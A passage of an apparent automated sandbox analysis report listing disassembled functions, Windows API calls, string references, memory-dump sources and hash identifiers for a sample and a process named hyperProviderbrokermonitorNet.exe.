Part of subcall function 00A09097: GetCurrentProcess.KERNEL32(C0000417,00A13A34,00000050,00A21030), ref: 00A090BB
Part of subcall function 00A09097: TerminateProcess.KERNEL32(00000000), ref: 00A090C2

Strings

., xrefs: 00A0B4DB
*?, xrefs: 00A0B1FB

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction ID: e50b1b1e426159ea3d2fcf392d611067528052223cc9a4e9e02e9ce999cbf2f5
Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction Fuzzy Hash: 88516E71E1020EAFDF14DFA8D981AEDBBB5EF58314F244169E854E7381E735AA018B60

Function 009E75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E75E3

Part of subcall function 009F05DA: _wcslen.LIBCMT ref: 009F05E0

Part of subcall function 009EA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 009EA598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009E777F

Part of subcall function 009EA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,009EA325,?,?,?,009EA175,?,00000001,00000000,?,?), ref: 009EA501
Part of subcall function 009EA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,009EA325,?,?,?,009EA175,?,00000001,00000000,?,?), ref: 009EA532

Strings

:, xrefs: 009E7654

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 9702f98656485a364acfc0b70dc259320f2e991dc23fe28b2f02e8828e773d2e
Instruction ID: 831fc474572e80df932fa7ace9c0d50ed3aab08094c20f7acc1c109281774aab
Opcode Fuzzy Hash: 9702f98656485a364acfc0b70dc259320f2e991dc23fe28b2f02e8828e773d2e
Instruction Fuzzy Hash: BA418271801198AAEB26EBA6CC59FEEB37CAF95300F004096B605A7092DB745F85CF71

Function 009FB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009FB4E3
_wcslen.LIBCMT ref: 009FB4FE

Strings

}, xrefs: 009FB4D6

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 91287d5dfa43b2bbfeeaf6a4c5f7d794d962eb72c526fe240ba664ed18c9b447
Instruction ID: 312fe665bd927a46d1d9489bb8aecd85a43c546e27d92fd60d563fa88c44a504
Opcode Fuzzy Hash: 91287d5dfa43b2bbfeeaf6a4c5f7d794d962eb72c526fe240ba664ed18c9b447
Instruction Fuzzy Hash: A121AE7290431E5ADB31AE64E945B7AB3ECDF91754F14042AF780C7141EB699D4883A2

Function 009EF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 009EF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009EF2E4
Part of subcall function 009EF2C5: GetProcAddress.KERNEL32(00A281C8,CryptUnprotectMemory), ref: 009EF2F4

GetCurrentProcessId.KERNEL32(?,?,?,009EF33E), ref: 009EF3D2

Strings

CryptUnprotectMemory failed, xrefs: 009EF3CA
CryptProtectMemory failed, xrefs: 009EF389

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: afe473f3d1248b52d6bc21849fdf3d594bf92cd750db3208875ce12d56e23671
Instruction ID: db435e34804b18562f2a4a387318cdcb79375c5ca8c5601f971c2a9444b16838
Opcode Fuzzy Hash: afe473f3d1248b52d6bc21849fdf3d594bf92cd750db3208875ce12d56e23671
Instruction Fuzzy Hash: FA1159326012A5ABDF27AF36DC116BE3B58FF10790B108277FC455B291DA74DD428780

Function 009EB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 009EB9B8

Part of subcall function 009E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E40A5

Strings

%c:\, xrefs: 009EB9AE

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: f683ccc92038c1682d85105459d2eeae02bf9ed20d764e5246eb58d33850fb3a
Instruction ID: f4b3419812abb4802b840cd2f62c7b085cdc9705a8bd77116a86c27cad6d5b5e
Opcode Fuzzy Hash: f683ccc92038c1682d85105459d2eeae02bf9ed20d764e5246eb58d33850fb3a
Instruction Fuzzy Hash: DB01456310035179DE326B769C46E6BA3ECEEC5370B50481AF644D2082EB24DC40C3F1

Function 009F101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,009F1160,?,00000000,00000000), ref: 009F1043
SetThreadPriority.KERNEL32(?,00000000), ref: 009F108A

Part of subcall function 009E6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E6C54

Strings

CreateThread failed, xrefs: 009F104F

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: a502c549663befadca0e7e2f2f0b14d7b8d5e3b8a4ea3ac681940c67207bb16d
Instruction ID: 9ac5a89d50141221826bd597d935c043f4ab4660847c6d517a628ea809d02ad1
Opcode Fuzzy Hash: a502c549663befadca0e7e2f2f0b14d7b8d5e3b8a4ea3ac681940c67207bb16d
Instruction Fuzzy Hash: 4A012BB534434DABD3309E68AC41B767398EB90790F20003DF78652280CEA16C854764

Function 009E1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 009EE2E8: _swprintf.LIBCMT ref: 009EE30E
Part of subcall function 009EE2E8: _strlen.LIBCMT ref: 009EE32F
Part of subcall function 009EE2E8: SetDlgItemTextW.USER32(?,00A1E274,?), ref: 009EE38F
Part of subcall function 009EE2E8: GetWindowRect.USER32(?,?), ref: 009EE3C9
Part of subcall function 009EE2E8: GetClientRect.USER32(?,?), ref: 009EE3D5

GetDlgItem.USER32(00000000,00003021), ref: 009E135A
SetWindowTextW.USER32(00000000,00A135F4), ref: 009E1370

Strings

0, xrefs: 009E1319

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 1867b3a473107812b546b372d48c9fce80382d185184a9b267d801d0871f230e
Instruction ID: 68325c9126561d976361afff2ebf770d245d24f6406e8e13328ff86a22f08221
Opcode Fuzzy Hash: 1867b3a473107812b546b372d48c9fce80382d185184a9b267d801d0871f230e
Instruction Fuzzy Hash: BDF08C741042C8BADF174F66880DBEA3B5DAB81344F049715FD44549E1CB79CE91AA10

Function 009F0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,009F1206,?), ref: 009F0FEA
GetLastError.KERNEL32(?), ref: 009F0FF6

Part of subcall function 009E6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E6C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 009F0FFF

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: c1c561c729c582c432e55a015f9ce75215f04f5e7f6bd31bfbe82481730b6bcc
Instruction ID: 2d9818c53692d2fa1f5c102d1b761c8517c61dcb68857ba910dd75d26ebaa723
Opcode Fuzzy Hash: c1c561c729c582c432e55a015f9ce75215f04f5e7f6bd31bfbe82481730b6bcc
Instruction Fuzzy Hash: FCD02B3254813076CA1137286C0ADBE3D089F76771B304728F279641E2CE100D824291

Function 009EE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,009EDA55,?), ref: 009EE2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,009EDA55,?), ref: 009EE2B1

Strings

RTL, xrefs: 009EE2AB

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 21be1d6fabbac99c67c76214dea511d174d5a534343c09533475ae7f64284bc0
Instruction ID: a23d5e3f23a417aed0dff309ea927c51bf2fa70bdc8572318ca1fc3dc8a3c5e3
Opcode Fuzzy Hash: 21be1d6fabbac99c67c76214dea511d174d5a534343c09533475ae7f64284bc0
Instruction Fuzzy Hash: 3BC0123264076066EE305FA57C0DBC36E985B04B51F05048CB241F96D1D6E5C98186A0

Analysis Process: hyperProviderbrokermonitorNet.exePID: 1416, Parent PID: 3064COMMON

Executed Functions

Function 00007FFD34660D47 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

5Z_H, xrefs: 00007FFD34660DF3

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: 5Z_H
API String ID: 0-3267294416
Opcode ID: eaf2b2f001e21cc5e1d9c369a15f006849ec445d9e777ecc0b80f840aa754da7
Instruction ID: 9fa40bd5a94450abfeb281926e2631999e393fa8e1bf3ca5446764c5d5c1a498
Opcode Fuzzy Hash: eaf2b2f001e21cc5e1d9c369a15f006849ec445d9e777ecc0b80f840aa754da7
Instruction Fuzzy Hash: D591C071A0CA998FE799DB6C88A93E97FE1FB56314F1401BFC089D72E2CA7C24118741

Function 00007FFD34660E43 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5911b454761acd46b0e52a43f7e1d616fb8637509aa775fc837a971593b501a
Instruction ID: be310662b87a090ee0991f26108dbdb5c7287c846f57fa472f2427107b95eb1e
Opcode Fuzzy Hash: c5911b454761acd46b0e52a43f7e1d616fb8637509aa775fc837a971593b501a
Instruction Fuzzy Hash: 2851AF72B18A9D8EE798CB5C88A93F97FE1FB9A324F50017ED049D77D1CAB914118740

Function 00007FFD34A64A48 Relevance: 2.7, Strings: 2, Instructions: 156COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD34A64AB2
@l4, xrefs: 00007FFD34A64BE7

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: $@l4
API String ID: 0-4179572257
Opcode ID: d0c6e60f84c45af2afed3a65e66bb9a8bb72e36327638e9dbbc12cab498a6165
Instruction ID: cabd15c2e9b65365543fadde1d27af7279a40e4a002d9a372813c23a8790bc7f
Opcode Fuzzy Hash: d0c6e60f84c45af2afed3a65e66bb9a8bb72e36327638e9dbbc12cab498a6165
Instruction Fuzzy Hash: 30516D71E0860A9FDB58DF98C4A55FDBBB1FF56314F2040BAC00AEB282CA3C6901DB54

Function 00007FFD34A6B360 Relevance: 1.7, Strings: 1, Instructions: 412COMMON

Download Yara Rule

Strings

`bl4, xrefs: 00007FFD34A6B6F4

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: `bl4
API String ID: 0-3117279055
Opcode ID: 41b1c1ced3eb9ba24a844b0b0ed097650ab7ca2f98c04c0b891c88c2334bdb4e
Instruction ID: a5ed7bf672750f178e99c2e2dabf2082b772867f6d5fa35027f41ed2a6aaa739
Opcode Fuzzy Hash: 41b1c1ced3eb9ba24a844b0b0ed097650ab7ca2f98c04c0b891c88c2334bdb4e
Instruction Fuzzy Hash: 11D1FE30A0DB568FE369CB28D0E41B577E1FF46328B24457EC58FC3A92DA2DB8429741

Function 00007FFD34A627BB Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

8{4, xrefs: 00007FFD34A627FE

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: 8{4
API String ID: 0-2525434730
Opcode ID: eccdf92aab73886efe377614c4068edb17a517f6ed78549c88dc5e54d8ea2f9e
Instruction ID: a0c5b89b1d3e418e58bc16bfffdec8f1d6389203f4d2fff7b112219e664569cd
Opcode Fuzzy Hash: eccdf92aab73886efe377614c4068edb17a517f6ed78549c88dc5e54d8ea2f9e
Instruction Fuzzy Hash: FD718232E1864A8FEB65EB64C8A46FDBBB0FF56324F20057AD10ED7191DE2C6841E750

Function 00007FFD34A6A0B2 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD34A6A122

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 2db9fa0efd0b01ab6453e007fa03fdb22d32b8fa4e9de5520c7d9eef454bd123
Instruction ID: cb61c00bb36b323257f01cdc9a81c1b7b4d65b6a0cea628f62534cd1e4f5961f
Opcode Fuzzy Hash: 2db9fa0efd0b01ab6453e007fa03fdb22d32b8fa4e9de5520c7d9eef454bd123
Instruction Fuzzy Hash: A4517E31F0864A8FEB59DBA8C4A55FCB7B1FF46314F21407AC11AEB296DA3D6801DB50

Function 00007FFD346608D0 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

(7q4, xrefs: 00007FFD3466AC65

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: (7q4
API String ID: 0-1920341978
Opcode ID: 4db4f4649ef02493d1d0cde9427efee43e047f5dbc1615051a301da65457ac8e
Instruction ID: fcb952d96b6f07512b01db96f745d33205eab3b681a74a13e950d14e6e607cb2
Opcode Fuzzy Hash: 4db4f4649ef02493d1d0cde9427efee43e047f5dbc1615051a301da65457ac8e
Instruction Fuzzy Hash: 66410522B0C6690BE714B7BCB4AA6FA77C5DF85339B1505BBD58DC7193CD1CA8418288

Function 00007FFD34A6DB0D Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

J_H, xrefs: 00007FFD34A6DB63

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: J_H
API String ID: 0-2551282735
Opcode ID: f387c3cb59f4f8f93c33bf8b7b5ba65fdfc00073a74afa9b26fe254ffa1ea9b8
Instruction ID: e190a2af203cf0832f88a86454cb5ecab8ee677a4c72941445adf293d5b117ae
Opcode Fuzzy Hash: f387c3cb59f4f8f93c33bf8b7b5ba65fdfc00073a74afa9b26fe254ffa1ea9b8
Instruction Fuzzy Hash: BA314571F0890A9FDB88DA68D4A15A8F7A2FF95324B644139D11ED7682CF2CB852D780

Function 00007FFD34660998 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

(7q4, xrefs: 00007FFD3466AC65

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: (7q4
API String ID: 0-1920341978
Opcode ID: 5993ca690f0705663a39b354e42902772a0cee60dd5a3cf00f39fd3a0cb55afd
Instruction ID: c142e705df53fc5b9525221cd286370c9e679eca8f807cd55e127d05a51b3584
Opcode Fuzzy Hash: 5993ca690f0705663a39b354e42902772a0cee60dd5a3cf00f39fd3a0cb55afd
Instruction Fuzzy Hash: F121F621B1C96D0FF758FB6C94AA6B976C6EB9A325F1000BDE94EC32D2DD1CAC414284

Function 00007FFD34A634B2 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

{4, xrefs: 00007FFD34A6350C

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: {4
API String ID: 0-2161631311
Opcode ID: 198e6b64b00453c511ab96adaa43fd9369df104db45c8a0385e5915e5ba39043
Instruction ID: 02b80646888c1a035541e31ef53b8d039a9eaccc92e3a0ac54db15fdf53f18e0
Opcode Fuzzy Hash: 198e6b64b00453c511ab96adaa43fd9369df104db45c8a0385e5915e5ba39043
Instruction Fuzzy Hash: 45214F71F1991A8FDB48EA58D4A19A9F3A2FF59314B205139D51ED3682CF38BC12DB80

Function 00007FFD34A62C31 Relevance: .6, Instructions: 627COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 332e65d3ea2a63d9ee86088b74e293eb9e3576ed0dae64bca39041d38e100028
Instruction ID: 3a8591d9e730737eae3af2e2065effacbe4c552377573bab6a392c6c42e198e9
Opcode Fuzzy Hash: 332e65d3ea2a63d9ee86088b74e293eb9e3576ed0dae64bca39041d38e100028
Instruction Fuzzy Hash: C322CB31B0CA198FDB98EB08C8A5A7877E1FF55325F6441B9D14EC7292DE2CAC45CB80

Function 00007FFD34A64CAF Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54298bb9255dcbb10a32a5b3f203fe86ac613f8294bb19d8c8adcbd0bb7d8240
Instruction ID: 7b9baa1a3eaa9f0433cedd3094496a29544f0b5d8c09aba883e8025a3c09ba7a
Opcode Fuzzy Hash: 54298bb9255dcbb10a32a5b3f203fe86ac613f8294bb19d8c8adcbd0bb7d8240
Instruction Fuzzy Hash: 3BF1B130A185568FEB99CF18D4E16B537A1FF46314B6441BDC94BCB68BCA3CE881DB81

Function 00007FFD34A65CF1 Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba9a7becd46f5fe38fd9e8646780895370d248eb02e8ebc059571214b8661c4c
Instruction ID: acde49267ef7be65b91cbee58223417f36c0a36d4fcfcb861188399401d81415
Opcode Fuzzy Hash: ba9a7becd46f5fe38fd9e8646780895370d248eb02e8ebc059571214b8661c4c
Instruction Fuzzy Hash: 7AD1D130A0DB468FE7A8CB28E4E157577E1FF46328B24457EC58EC3692DE2DB8429741

Function 00007FFD34A64CCF Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03e51f151252c4951f64985be36115e08e474f0bd9f61b34ec3ae32d1e3ac046
Instruction ID: d86f7da316fe4b30450f6aa3debf2d5eb24f07480b704c2ed0f6fdf4a2fe6d24
Opcode Fuzzy Hash: 03e51f151252c4951f64985be36115e08e474f0bd9f61b34ec3ae32d1e3ac046
Instruction Fuzzy Hash: C3C1BF306195528FEB49CF08D0E05B537A1FF46324B6545BDC99BCB68BCA3CE881DB84

Function 00007FFD34A64562 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

